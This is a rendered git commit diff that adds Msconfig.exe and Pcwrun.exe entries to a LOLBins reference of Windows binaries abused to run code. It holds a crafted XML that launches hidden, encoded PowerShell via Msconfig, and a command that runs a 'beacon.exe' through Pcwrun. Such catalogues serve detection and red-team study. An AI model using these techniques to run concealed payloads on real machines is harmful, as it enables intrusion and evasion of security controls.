commit
a9094f0d47
10
LOLBins.md
10
LOLBins.md
|
@ -29,16 +29,18 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Makecab.exe](OSBinaries/Makecab.md)
|
||||
[Mavinject.exe](OSBinaries/Mavinject.md)
|
||||
[Msbuild.exe](OSBinaries/Msbuild.md)
|
||||
[Msconfig.exe](OSBinaries/Msconfig.md)
|
||||
[Msdt.exe](OSBinaries/Msdt.md)
|
||||
[Mshta.exe](OSBinaries/Mshta.md)
|
||||
[Msiexec.exe](OSBinaries/Msiexec.md)
|
||||
[Nltest.exe](OSBinaries/Nltest.md)
|
||||
[Odbcconf.exe](OSBinaries/Odbcconf.md)
|
||||
[Pcalua.exe](OSBinaries/Pcalua.md)
|
||||
[Pcalua.exe](OSBinaries/Pcalua.md)
|
||||
[Pcwrun.exe](OSBinaries/Pcwrun.md)
|
||||
[Powershell.exe](OSBinaries/Powershell.md)
|
||||
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
||||
[Print.exe](OSBinaries/Print.md)
|
||||
[Psr.exe](OSBinaries/Psr.md)
|
||||
[Print.exe](OSBinaries/Print.md)
|
||||
[Psr.exe](OSBinaries/Psr.md)
|
||||
[Qprocess.exe](OSBinaries/Qprocess.md)
|
||||
[Reg.exe](OSBinaries/Reg.md)
|
||||
[Regedit.exe](OSBinaries/Regedit.md)
|
||||
|
@ -50,7 +52,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Robocopy.exe](OSBinaries/Robocopy.md)
|
||||
[Rpcping.exe](OSBinaries/Rpcping.md)
|
||||
[Rundll32.exe](OSBinaries/Rundll32.md)
|
||||
[Runonce.exe](OSBinaries/Runonce.md)
|
||||
[Runonce.exe](OSBinaries/Runonce.md)
|
||||
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
|
||||
[Sc.exe](OSBinaries/Sc.md)
|
||||
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
## Msconfig.exe
|
||||
|
||||
* Prerequisites
|
||||
|
||||
add a crafted .xml in System32
|
||||
```
|
||||
<?xml version="1.0" ?>
|
||||
<MSCONFIGTOOLS>
|
||||
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"
|
||||
DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
|
||||
</MSCONFIGTOOLS>
|
||||
```
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Msconfig.exe -5
|
||||
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Pierre-Alexandre Braeken - @pabraeken
|
||||
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/pabraeken/status/991314564896690177
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\msconfig.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,26 @@
|
|||
## Pcwrun.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Pcwrun.exe c:\temp\beacon.exe
|
||||
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Pierre-Alexandre Braeken - @pabraeken
|
||||
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/pabraeken/status/991335019833708544
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\pcwrun.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue